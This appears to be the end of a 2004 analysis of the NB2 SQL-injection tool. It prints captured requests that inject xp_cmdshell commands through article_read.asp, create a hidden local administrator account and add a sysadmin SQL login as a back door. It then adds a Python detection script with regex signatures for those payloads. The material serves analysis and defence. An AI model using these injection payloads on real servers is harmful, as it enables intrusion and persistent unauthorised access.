cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bdrop+table+nb%5fcommander%5ftmp%3bexec+master%2e%2exp%5fcmdshell+%27del+c%3a%5cnb%5fcommander%5ftxt%2elog%27%2d%2d

i.e. article_read.asp?id=80;exec master..xp_cmdshell 'dir c:\'--
No output is read back; the command is simply fired and forgotten.

The cookie is worth a look: it carries the previous request, which was NB2's cleanup after the echoed run, drop table nb_commander_tmp;exec master..xp_cmdshell 'del c:\nb_commander_txt.log'--. So NB2 does try to remove its scratch table and log file after an echo run; on a target where the batch only partly succeeded, those two names are useful artefacts to look for during an investigation.

Output shown:
Command executed

////////////////////////////////////////////////
DOS command:
net user tsinternetusers password /add

get /article_read.asp?id=80;exec%20master..xp_cmdshell%20'net%20user%20tsinternetusers%20password%20/add'-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27dir+c%3a%5c%27%2d%2d

Any other DOS command is executed the same way, for example adding a local account and putting it into Administrators (the name tsinternetusers resembles the built-in Terminal Services account TsInternetUser, presumably so that it does not stand out):
id=80;exec master..xp_cmdshell 'net user tsinternetusers password /add'--
id=80;exec master..xp_cmdshell 'net localgroup administrators tsinternetusers /add'--


Executing SQL statements (the same mechanism as for DOS commands, without xp_cmdshell)


get /article_read.asp?id=80;exec%20master..sp_addlogin%20username,password-- http/1.1
accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
user-agent: microsoft url control - 6.00.8862
host: www.testdb.net
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidsstcttqd=ellnneidceeanbmokamgjged; articleid=80%3bexec+master%2e%2exp%5fcmdshell+%27net+user+tsinternetusers+password+%2fadd%27%2d%2d

id=80;exec master..sp_addlogin username,password--
id=80;exec master..sp_addsrvrolemember username,sysadmin--
....

These two create a SQL Server login and add it to the sysadmin server role, i.e. a persistent back door into the database server. Both need privileges the current login has to hold already: on SQL Server 2000 sp_addlogin is limited to sysadmin and securityadmin members, and adding a member to sysadmin requires sysadmin.

////////////////////////////////////////////////

That concludes the analysis of NB2's main functions; the rest you can analyse yourselves. This is the first time I have written something this long, so it may be a bit messy and is bound to contain mistakes, but I really do not have the energy to go through it word by word. I hope it is understandable. Thanks!

 

                                                              hnxyy (虛空)
                                                              2004/11/26, 10:30 pm
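Detection logic for the traffic documented in this article, as an added example that is not part of the original article. It runs a set of signatures drawn from the captured requests (the char(124) terminator, the ;declare @a batch probe, catalog reads, role probes, xp_cmdshell, bulk insert, NB2's nb_commander_* scratch names and the login/role procedures) over constructed IIS-style log lines and groups the hits per client. The log format, timestamps and addresses are constructed; the user-agent string is the one in the capture and is treated as a weak signal on its own, because it is the default of the VB Internet Transfer Control, which legitimate programs also use.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed IIS-style lines: date time client-ip method uri-stem uri-query status user-agent.
# The query strings are the payloads captured in this article; hosts and times are made up.
SAMPLE_LOG = """\
2004-11-26 14:00:01 10.0.0.5 GET /article_read.asp id=80 200 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:00:02 10.0.0.5 GET /article_read.asp id=80%20and%20user%2bchar(124)=0 500 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:00:03 10.0.0.5 GET /article_read.asp id=80;declare%20@a%20int-- 200 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:00:04 10.0.0.5 GET /article_read.asp id=80%20and%20(select%20count(1)%20from%20[sysobjects])>=0 200 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:00:05 10.0.0.5 GET /article_read.asp id=80%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20varchar(1))%2bchar(124)=1 500 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:01:10 10.0.0.5 GET /article_read.asp id=80;exec%20master..xp_cmdshell%20'dir%20c:\\%20>%20c:\\nb_commander_txt.log';drop%20table%20nb_commander_tmp-- 200 Microsoft+URL+Control+-+6.00.8862
2004-11-26 14:05:00 10.0.0.9 GET /article_read.asp id=81 200 Mozilla/4.0+(compatible;+MSIE+6.0)
"""

SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2, "critical": 3}

# (name, severity, pattern applied to the URL-decoded query string)
RULES = [
    ("char(124) terminator, error-based extraction", "high", re.compile(r"char\(124\)", re.I)),
    ("stacked batch probe (;declare @a int--)", "high", re.compile(r";\s*declare\s+@\w+", re.I)),
    ("system catalog read", "medium", re.compile(r"\bsys(?:objects|columns)\b", re.I)),
    ("role membership probe", "medium", re.compile(r"\bis_(?:srvrole)?member\s*\(", re.I)),
    ("xp_cmdshell", "critical", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("NB2 scratch objects (nb_commander_*)", "critical", re.compile(r"nb_commander_(?:tmp|txt)", re.I)),
    ("bulk insert from file", "critical", re.compile(r"\bbulk\s+insert\b", re.I)),
    ("login or server-role change", "critical", re.compile(r"\bsp_add(?:login|srvrolemember)\b", re.I)),
]
NB2_USER_AGENT = "Microsoft URL Control - 6.00.8862"   # weak signal on its own


def parse_line(line):
    """Split one constructed log line into a record; IIS writes '+' for spaces in the UA."""
    date, time, ip, method, stem, query, status, agent = line.split(" ", 7)
    return {"ts": date + " " + time, "ip": ip, "method": method, "stem": stem,
            "query": unquote(query), "status": int(status), "agent": agent.replace("+", " ")}


def scan(log_text):
    """Return one alert per matching line: (line number, ip, status, worst severity, [rule names])."""
    alerts = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        rec = parse_line(line)
        hits = [(name, sev) for name, sev, rx in RULES if rx.search(rec["query"])]
        if rec["agent"] == NB2_USER_AGENT:
            hits.append(("NB2 default user-agent", "low"))
        if hits:
            worst = max(hits, key=lambda h: SEVERITY_ORDER[h[1]])[1]
            alerts.append((number, rec["ip"], rec["status"], worst, [h[0] for h in hits]))
    return alerts


def by_client(alerts):
    """Group alerts per source address: flagged requests, 500 responses, worst severity.

    Error-based extraction shows up as a run of 500 responses from one address,
    which is a stronger indicator than any single request on its own.
    """
    summary = defaultdict(lambda: {"flagged": 0, "errors_500": 0, "worst": "low"})
    for _, ip, status, worst, _ in alerts:
        entry = summary[ip]
        entry["flagged"] += 1
        entry["errors_500"] += int(status == 500)
        if SEVERITY_ORDER[worst] > SEVERITY_ORDER[entry["worst"]]:
            entry["worst"] = worst
    return dict(summary)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(by_client(found))
```

The rules are deliberately tied to the shapes NB2 emits; a tool that encodes differently (char() chains for every literal, or the hex form for table names) would slip past the catalog and scratch-object rules, so the per-client view, with its count of 500 responses, is the part worth keeping generic.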

 